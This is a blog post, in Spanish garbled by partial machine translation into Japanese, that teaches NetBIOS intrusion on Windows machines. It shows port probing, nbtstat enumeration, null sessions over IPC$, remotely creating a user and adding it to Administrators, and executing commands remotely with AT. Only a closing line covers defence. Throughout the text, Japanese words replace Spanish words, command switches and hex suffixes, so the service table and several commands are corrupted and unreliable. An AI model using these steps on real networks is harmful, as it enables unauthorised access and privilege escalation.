NetBIOSによるハッキング

この Web サイトでは、NetBIOS を使用してリモート PC にできるだけ多くのデータを取得するさまざまな方法を示します.

Lo primero de todo es comprobar que el equipo al que queremos conectarnos tiene el puerto NetBIOS abierto, ザ puerto es el 139; se puede hacer mediante la concola de MSDOS con ete comando: telnet DIRECCIONIP 139 y si se conecta lo tendrá abierto y sino pues a buscar otro PC.

Lo Segundo más importante es tener la tabla NetBios, que nos indicará que servicios tiene en ejecución el equipo remoto que comrobaremos con los resultados obtenidos con posteriores comandos

名前
Sufijo
やつ
サービス
<computername>
00
又は
Workstation Service
<computername>
01
又は
Messenger Service
<_MSBROWSE_>
01
G
Master Browser
<computername>
03
又は
Messenger Service
<computername>
06
又は
RAS Server Service
<computername>
1F
又は
NetDDE Service
<computername>
20
又は
File Server Service
<computername>
21
又は
RAS Client Service
<computername>
22
又は
Exchange Interchange
<computername>
23
又は
Exchange Store
<computername>
24
又は
Exchange Directory
<computername>
30
又は
Modem Sharing Server Service
<computername>
31
又は
Modem Sharing Client Service
<computername>
43
又は
SMS Client Remote Control
<computername>
44
又は
SMS Admin Remote Control Tool
<computername>
45
又は
SMS Client Remote Chat
<computername>
46
又は
SMS Client Remote Transfer
<computername>
4C
又は
DEC Pathworks TCPIP Service
<computername>
52
又は
DEC Pathworks TCPIP Service
<computername>
87
又は
Exchange MTA
<computername>
6宛先
又は
Exchange IMC
<computername>
BE
又は
Network Monitor Agent
<computername>
BF
又は
Network Monitor Apps
<ユーザー名>
03
又は
Messenger Service
<ドメイン>
00
G
ドメイン名
<ドメイン>
1B
又は
Domain Master Browser
<ドメイン>
1C
G
ドメイン コントローラー
<ドメイン>
1D
又は
Master Browser
<ドメイン>
1そして
G
Browser Service Elections
<INet~Services>
1C
G
インターネット情報サーバ
<IS~Computer_name>
00
又は
インターネット情報サーバ

Con este comando de MSDOS podremos saber que servicios corre la maquina remota: nbtstat -A DIRECCIONIP 又は nbtstat -a NOMBREPC. Aparte de esto también nos dará la direccion マック por si nos interesase.

ネットBIOS
Como podremos ver en la imagen hacemos un nbtstat a una IP o nombrePC y nos da esos resultados, que los comparamos con la tabla NetBIOS y sacaremos datos jugosos como su usuario, al dominio que pertenecey si fuese un Controlador de Dominio veriamos los servicios que corre.

Para establecer lo que se llama sesión nula, tenemos que ejecutar este comando: net use DIRECCIONIPIPC$ “”/又は:”” . Lo que realmente hace este comando es autenticarse en el PC remoto con el usuario anonimo.

Para autenticarnos en un equipo remoto con un usuario en concreto: net use DIRECCIONIP /u:USUARIO CONTRASEÑA 又は net use DIRECCIONIPC$ /u:USUARIO CONTRASEÑA 又は net use DIRECCIONIPRECURSO /u:USUARIO CONTRASEÑA Una vez autenticados en el host remoto para ver el contenido de la carpeta se puede hacer net view DIRECCIONIP y veremos el contenido via MSDOS, pero tambien puedes hacer, INICIO > EJECUTAR y pones lo que quieras: DIRECCIONIP o DIRECCIONIPRECURSO y te mostrará con la ventana del explorador de Windows el contenido.

Ver la hora remota: net time DIRECCIONIP
Ver dominios disponibles: net view /domain
Ver equipos de un dominio concreto: net view /domain:ブハラ
Ver los usuarios de un equipo: net user
Ver los detalles de un usuario: net user nombreusuario
Crear un usuario: net user nombreusuario contraseña /ADD (Ideal para crear un usuario en un PC remoto con el comando AT)
Borrar un usuario: net user nombreusuario /DELETE
Ver los grupos de un PC: net group
Meter a un usuario en un grupo: net group nombregrupo nombreusuario /ADD (Ideal para meter en grupo Administradores al usuario que hemos creado remotamente en un PC)
Sacar a un usuario de un grupo: net group nombregrupo nombreusuario /
削除

命令 AT, para ejecutar cosas en remoto. Con el comando at DIRECCIONIP veremos las tareas programadas que tiene su equipo y con el comando at DIRECCIONIP 21:30 /INTERACTIVEcomando de msdos a ejecutar en el PC remoto”. En el comando anterior el valor 21:30 es la hora a la que le he puesto yo que se ejecute el comando de MSDOS que va entre comillas, así que se le puede poner cualquier hora, pero primero mira mejor que hora tiene!

La herramienta del Kit de Recursos de MS Windows nltest.rar muestra los controladores de dominio de un dominio en concreto, 例:
C:>nltest /dclist:bujarra.com
List pof DCS in Domain bujarra.com
bujarra01

Interesante sería el programa Nbtscan que lo que hace es un ‘nbtstatde toda una red a una velocidad impresionante.Ejemplo:

C:>nbtscan 192.168.0.0/24
&nbspDoing NBT name scan for addresses from 192.168.0.0/24
&nbspIP address &nbspNetBIOS Server &nbspServer &nbspUser &nbspMAC address
&nbsp—————————————————————————–
&nbsp192.168.0.0 &nbspSendto failed: Cannot assign requested address
&nbsp192.168.0.1 &nbspBUJARRA01 <サーバー> <不明> &nbsp00-e0-7d-78-11-e6
&nbsp192.168.0.13 &nbspMARIA <サーバー> &nbspMARIA &nbsp00-e0-7d-76-5a-2b
&nbsp192.168.0.55 &nbspVICETOPC <サーバー> &nbspVICETO 00-00-f8-30-fa-23
&nbsp192.168.0.100 &nbspRecvfrom failed: ピアによる接続のリセット

対して protegernos de este tipo de ataques debemos o cerrar el puerto 139 en el router, o habilitaremos el firewall en XP o quitaremos el servicio de compartir carpetas e impresoras para redes microsoft (en cualquier S.O. マイクロソフトの).


おすすめの投稿

著者

nheobug@bujarra.com
Autor del blog Bujarra.com Cualquier necesidad que tengas, 私に連絡することを躊躇しないでください, できる限りお手伝いします, シェアリングは生きていること ;) . ドキュメントを楽しむ!!!